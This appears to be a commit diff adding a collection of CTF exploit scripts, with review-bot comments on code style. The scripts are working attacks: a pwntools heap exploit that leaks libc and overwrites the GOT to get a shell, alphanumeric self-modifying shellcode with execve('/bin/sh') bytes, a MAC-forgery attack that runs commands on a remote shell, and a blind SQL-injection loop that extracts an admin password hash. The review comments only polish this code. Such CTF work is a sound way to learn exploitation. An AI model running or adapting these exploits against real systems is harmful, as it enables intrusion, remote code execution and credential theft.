Showing
19 changed files
with
1,157 additions
and
0 deletions.
@@ -0,0 +1,90 @@ | ||
from pwn import * | ||
context.log_level = 'DEBUG' | ||
|
||
e = ELF('./Cat') | ||
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') | ||
#p = process('./Cat') | ||
p = remote('178.62.40.102', 6000) | ||
|
||
def create(name, kind, age): | ||
p.sendline('1') | ||
p.recvuntil('> ') | ||
p.sendline(name) | ||
p.recvuntil('> ') | ||
p.sendline(kind) | ||
p.recvuntil('> ') | ||
p.sendline(str(age)) | ||
|
||
p.recvuntil('> ') | ||
|
||
def edit(i, name, kind, age, save): | ||
p.sendline('2') | ||
p.recvuntil('> ') | ||
p.sendline(str(i)) | ||
p.recvuntil('> ') | ||
p.sendline(name) | ||
p.recvuntil('> ') | ||
p.sendline(kind) | ||
p.recvuntil('> ') | ||
p.sendline(str(age)) | ||
p.recvuntil('> ') | ||
if save: | ||
p.sendline('y') | ||
else: | ||
p.sendline('n') | ||
|
||
|
||
def print_one(i): | ||
p.sendline('3') | ||
p.recvuntil('> ') | ||
p.sendline(str(i)) | ||
|
||
p.recvuntil(': ') | ||
name = p.recvline()[:-1] | ||
p.recvuntil(': ') | ||
t = p.recvline()[:-1] | ||
p.recvuntil(': ') | ||
age = p.recvline()[:-1] | ||
|
||
p.recvuntil('> ') | ||
|
||
return (name, t, age) | ||
|
||
def print_all(): | ||
p.sendline('4') | ||
stuff = p.recvuntil('print all:') | ||
|
||
p.recvuntil('> ') | ||
|
||
return stuff | ||
|
||
def delete(i): | ||
p.sendline('5') | ||
p.recvuntil('> ') | ||
p.sendline(str(i)) | ||
|
||
p.recvuntil('> ') | ||
|
||
p.recvuntil('> ') | ||
create("AAAA", "BBBB", 1) | ||
create("AAAA", "BBBB", 2) | ||
edit(1, "a", "b", 2, False) | ||
p.recvuntil('> ') | ||
create("CCCC", p64(e.got['putchar'] + 0x100), 2) | ||
edit(0, "EEEEEEEE", "F"*0x10 + p64(e.got['puts'])[:5], 2, True) | ||
p.recvuntil('> ') | ||
|
||
puts_libc, _, _ = print_one(2) | ||
puts_libc = u64(puts_libc.ljust(8, '\x00')) | ||
libc.address = puts_libc - libc.symbols['puts'] | ||
|
||
print hex(libc.address) | ||
|
||
create("/bin/sh", "BBBB", 1) | ||
create("/bin/sh", "BBBB", 2) | ||
edit(4, "a", "b", 2, False) | ||
p.recvuntil('> ') | ||
create("CCCC", p64(e.got['free']), 2) | ||
edit(3, p64(libc.symbols['system']), "FFFF", 2, True) | ||
|
||
p.interactive() |
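Review bot: In `edit` (L39-L53) the `if save: ... else: ...` pair only picks between two one-character replies, so a conditional expression reads better: `p.sendline('y' if save else 'n')`. The helpers also carry no docstrings; a one-liner on each such as `"""Drive menu option 2; save=True answers the confirmation prompt with 'y'."""` would let a reader follow the menu protocol without tracing the recvuntil calls. Nothing in the file marks which interpreter it targets even though `print hex(libc.address)` (L113) and the str-based `ljust(8, '\x00')` (L109) are Python 2 only; a shebang or a header comment stating that would document it.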
@@ -0,0 +1,55 @@ | ||
#!/usr/bin/env python | ||
from pwn import * | ||
import hashlib | ||
import itertools | ||
import numpy as np | ||
|
||
context.log_level = "debug" | ||
p = remote("37.139.22.174", 11740) | ||
p.recvuntil("Submit") | ||
ln = p.recvn(len("a printable string X, such that sha256(X)[-6:] = 10d36290")) | ||
brute_str = ln.split(" = ")[-1].strip() | ||
print(brute_str) | ||
|
||
def brute(): | ||
for count in range(1,126): | ||
for i in itertools.combinations(range(32, 126), count): | ||
string = "".join(map(chr,i)) | ||
sha = hashlib.sha256(bytes(string)) | ||
if sha.hexdigest()[-6:] == brute_str: | ||
print(string) | ||
return string | ||
|
||
p.sendline(brute()) | ||
p.recvline() | ||
p.recvline() | ||
|
||
n = int(p.recvline().split(" = ")[-1].strip()) | ||
#p.interactive() | ||
|
||
def pcomp(n): | ||
p2 = 1; | ||
i = 0; | ||
while( p2 < n ): | ||
p2 = np.left_shift(p2, 2); | ||
i = np.add(i, 2); | ||
|
||
p2= np.right_shift(p2, 2); | ||
i = np.subtract(i, 2); | ||
p2 = np.right_shift(p2, i/2) | ||
return p2 | ||
|
||
|
||
def squareLowerThan(n): | ||
p = pcomp(n) | ||
p2 = np.square(p) | ||
d = 1; | ||
while( p2 + np.multiply(2,p) + d < n ): | ||
p2 = np.add(p2, np.multiply(2,p) + d); | ||
d = np.add(d, 2); | ||
return p2; | ||
|
||
ans = squareLowerThan(n) | ||
print(ans) | ||
p.sendline(str(ans)) | ||
print p.recvall() |
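Review bot: `pcomp` (L164-L175) and `squareLowerThan` (L180-L187) route every operation through numpy (`np.left_shift`, `np.square`, `np.add`), which turns the Python ints into fixed-width integers that wrap silently on overflow, so for an `n` beyond roughly 2**63 the `while( p2 < n )` comparison is evaluated on a wrapped value instead of raising. Plain Python ints are arbitrary precision and the loops need nothing from numpy; presumably the intended result is the largest perfect square strictly below `n`, which on Python 3.8+ is simply `r = math.isqrt(n - 1); return r * r`. `brute()` (L145-L152) falls off the end and returns `None` when no combination matches, and `p.sendline(brute())` at L155 does not handle that; raising a clear error, e.g. `raise RuntimeError("no match for " + brute_str)`, is better than a confusing failure inside sendline.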
@@ -0,0 +1,66 @@ | ||
from pwn import * | ||
|
||
p = process('./magic') | ||
#p = remote('magic.420blaze.in', 420) | ||
|
||
asm_s = "" | ||
asm_s += "dec esp;" * 4 | ||
asm_s += "pop ebx;" # ebx = 0 | ||
asm_s += "push ebx; pop eax;" # eax = 0 | ||
asm_s += "inc eax;" * 3 # eax = 3 for sys_read | ||
|
||
asm_s += """ | ||
push esp; | ||
inc esp; | ||
pop ecx; | ||
""" | ||
asm_s += "push ecx; pop ebp;" # ebp = 0x61313375 | ||
# shift 0x61313375 -> 0x61313370 | ||
asm_s += "dec ecx;" * 5 | ||
# shift 0x61313375 -> 0x61313380 | ||
asm_s += "inc ebp;" * (0x80-0x75) | ||
asm_s += """ | ||
push ecx; | ||
dec esp; | ||
""" | ||
asm_s += "pop esp;" | ||
|
||
# esp = 0x31337050 | ||
|
||
# 0x31337000: 0xbc 0x00 0x71 0x33 0x31 0x61 0x8b 0x25 | ||
# 0x31337008: 0x20 0x71 0x33 0x31 0x54 0x89 0x25 0x20 | ||
# 0x31337010: 0x71 0x33 0x31 0xbc 0x20 0x71 0x33 0x31 | ||
# 0x31337018: 0x60 0xe9 0x6d 0x16 0xd1 0xd6 0x00 0x00 | ||
|
||
# shift stack from 0x31337050 -> 0x31337024 | ||
asm_s += "push ebx;" * ((0x50-0x24) / 4) | ||
|
||
asm_s += "push esp; pop ecx;" # ecx = 0x024 | ||
asm_s += "dec ecx;" * 4 # ecx = 0x020 | ||
|
||
asm_s += "push ebx;" # sp = 0x020 | ||
asm_s += "dec esp;" * 4 # 020 -> 01c | ||
asm_s += "pop edi;" # eax = 0xd6d1 | ||
asm_s += "dec edi;" * (0xd1-0xcd) # eax=0xcd, esp=0x31337020 | ||
asm_s += "inc esp;" * 2 # esp=0x22 | ||
asm_s += "push edi;" # set *0x3133701e=0xcd | ||
asm_s += "pop edi;" | ||
asm_s += "inc esp;" | ||
asm_s += "push ebp;" | ||
asm_s += "dec esp;" | ||
|
||
asm_s += "push ebx;" # overwrite jump target | ||
|
||
|
||
stuff = asm(asm_s) | ||
|
||
print(stuff) | ||
print(len(stuff)) | ||
|
||
p.sendline(stuff) | ||
sleep(1) | ||
p.sendline("\x31\xc0\x50\x68\x2f\x2f\x73" | ||
"\x68\x68\x2f\x62\x69\x6e\x89" | ||
"\xe3\x89\xc1\x89\xc2\xb0\x0b" | ||
"\xcd\x80\x31\xc0\x40\xcd\x80") | ||
p.interactive() |
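Review bot: The comments at L249-L250 say `# eax = 0xd6d1` and `# eax=0xcd, esp=0x31337020`, but the instructions they annotate are `pop edi` and `dec edi`, so presumably they should read `# edi = 0xd6d1` and `# edi = 0xcd, esp=0x31337020`. These register-state comments are the only documentation in the block, so keeping them accurate matters more than usual; the dump at L233-L236 would likewise benefit from a one-line comment saying which memory it shows and where it was taken from.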
@@ -0,0 +1,51 @@ | ||
from pwn import * | ||
import subprocess | ||
|
||
e = ELF('./magic') | ||
|
||
regs = ['EDI', 'ESI', 'EBP', 'ESP', 'EBX', 'EDX', 'ECX', 'EAX'] | ||
|
||
last_msg = "AAAABAAACAAADAAAEAAAFAAAGAAAHAAA" | ||
|
||
out = "pop ESI;" | ||
|
||
for i in range(1, 48): | ||
stack = e.string(e.u32(e.symbols['r'] + (i*8 - 4))) | ||
msg = e.string(e.u32(e.symbols['r'] + (i*8))) | ||
next_stack = e.string(e.u32(e.symbols['r'] + (i*8 + 4))) | ||
|
||
# pushes don't modify msg | ||
if len(next_stack) > len(stack): | ||
pushed_val = next_stack[:4] | ||
idx = msg.find(pushed_val) | ||
if idx == -1: | ||
idx = 3 # ESP | ||
else: | ||
assert idx % 4 == 0 | ||
idx /= 4 | ||
out += "push "+regs[idx]+";" | ||
continue | ||
|
||
for j in range(0, 8*4, 4): | ||
if msg[j:j+4] != last_msg[j:j+4]: | ||
reg = regs[j/4] | ||
op = "" | ||
|
||
if len(next_stack) < len(stack): | ||
op = "pop "+reg+";" | ||
else: | ||
old_val = u32(last_msg[j:j+4]) | ||
new_val = u32(msg[j:j+4]) | ||
if new_val < old_val: | ||
op = "dec "+reg+";" | ||
else: | ||
op = "inc "+reg+";" | ||
|
||
last_msg = msg | ||
out += op | ||
break | ||
else: | ||
print hex(e.symbols['r'] + (i*8)) | ||
|
||
stuff = subprocess.check_output(['rasm2', '-b', '32', out]) | ||
print stuff.strip().decode('hex') |
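Review bot: `idx /= 4` (L313) and `regs[j/4]` (L320) rely on Python 2 integer division; under Python 3 both produce floats and the list index raises TypeError, and the `print` statements at L339 and L343 plus `.decode('hex')` are Python 2 only as well. `idx //= 4` and `reg = regs[j // 4]` make the integer intent explicit on either interpreter. The `else:` at L338 belongs to the inner `for` and runs only when no register differs from `last_msg`; a comment such as `# no register changed between messages: log the entry we could not decode` would save the next reader from re-deriving that.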
@@ -0,0 +1,18 @@ | ||
import requests | ||
|
||
flag = [''] * 0x100 | ||
|
||
for i in range(0x100, 0x3986): | ||
j = requests.post("http://something.420blaze.in:8545/", data='{"jsonrpc":"2.0","method":"eth_getBlockByNumber","params":["'+hex(i)+'", true],"id":1}', headers={"Content-Type": "application/json"}).json() | ||
for tx in j['result']['transactions']: | ||
func = tx['input'][2:10] | ||
arg1 = tx['input'][10:10+64] | ||
arg2 = tx['input'][74:74+64] | ||
arg3 = tx['input'][74+64:202] | ||
arg4 = tx['input'][202:].decode('hex').rstrip('\x00') | ||
if func == 'd1d13ebf': | ||
idx = int(arg1[-2:], 16) | ||
char = arg4[-1] | ||
flag[idx] = char | ||
print(flag) | ||
|
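Review bot: The JSON-RPC body at L356 is assembled by string concatenation around `hex(i)`; handing `requests` a dict via `json=` serializes it correctly and sets the Content-Type header for you: `requests.post(url, json={"jsonrpc": "2.0", "method": "eth_getBlockByNumber", "params": [hex(i), True], "id": 1}, timeout=10)`. The call also has no `timeout=`, so a single stalled response hangs the whole block scan. `arg4[-1]` at L365 raises IndexError when the argument is empty after `rstrip('\x00')`, and `.decode('hex')` at L362 is Python 2 only (`bytes.fromhex` on Python 3).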
@@ -0,0 +1,45 @@ | ||
from pwn import * | ||
|
||
r = remote('macsh.chal.pwning.xxx', 64791) | ||
r.recvuntil('> ') | ||
|
||
ls_blk = 'echo AAAAAAAAAAA' | ||
len_blk = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10' | ||
pad_blk = '\x10'*16 | ||
a_blk = 'A'*16 | ||
|
||
entered_len_blk = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00' | ||
|
||
m1 = entered_len_blk + pad_blk + a_blk + (a_blk*(16*8 - 3)) | ||
m1+= ls_blk + len_blk + a_blk + (a_blk*(16*8 - 3)) | ||
|
||
r.sendline('<|>tag '+ls_blk) | ||
echo_len_pad = r.recvline().strip().decode('hex') | ||
print(echo_len_pad) | ||
r.recvuntil('> ') | ||
|
||
r.sendline('<|>tag '+m1) | ||
echo_len = r.recvline().strip().decode('hex') | ||
print(echo_len) | ||
r.recvuntil('> ') | ||
|
||
def xor(x,y): | ||
return ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y)) | ||
|
||
pad = xor(echo_len_pad, echo_len) | ||
|
||
ls_blk = 'cat ././flag.txt' | ||
|
||
m1 = entered_len_blk + pad_blk + a_blk + (a_blk*(16*8 - 3)) | ||
m1+= ls_blk + len_blk + a_blk + (a_blk*(16*8 - 3)) | ||
|
||
r.sendline('<|>tag '+m1) | ||
ls_len = r.recvline().strip().decode('hex') | ||
print(ls_len) | ||
r.recvuntil('> ') | ||
|
||
ls_len_pad = xor(ls_len, pad) | ||
print(ls_len_pad) | ||
r.sendline(ls_len_pad.encode('hex') + '<|>' + ls_blk) | ||
|
||
r.interactive() |
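Review bot: The two `m1` constructions at L390-L391 and L416-L417 are identical apart from the command block, so a small helper, e.g. `def build_msg(cmd_blk): return entered_len_blk + pad_blk + a_blk + (a_blk*(16*8 - 3)) + cmd_blk + len_blk + a_blk + (a_blk*(16*8 - 3))`, would remove the duplication. `ls_blk` is reassigned to a different command at L413 while keeping its original name, which misleads; `cmd_blk` would fit both uses. The `xor` helper at L406-L407 has no docstring and silently truncates to the shorter input through `zip`; a one-line docstring stating that contract would make the truncation visible to callers.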
@@ -0,0 +1,20 @@ | ||
import requests, string | ||
|
||
passwd = "" | ||
|
||
for i in range(32): | ||
for c in string.hexdigits: | ||
q = "' UNION SELECT '83d069f7e011dc75b7c98e1c589c059d' FROM users WHERE username='admin' AND password LIKE '{}%'; -- " | ||
q = q.format(passwd + c) | ||
x = requests.post("http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi?", data={ | ||
'user': q, | ||
'pass': 'foo', | ||
'login': 'Login' | ||
}) | ||
if 'menu.cgi' in x.text: | ||
passwd += c | ||
print passwd | ||
break | ||
else: | ||
print 'asdf' | ||
|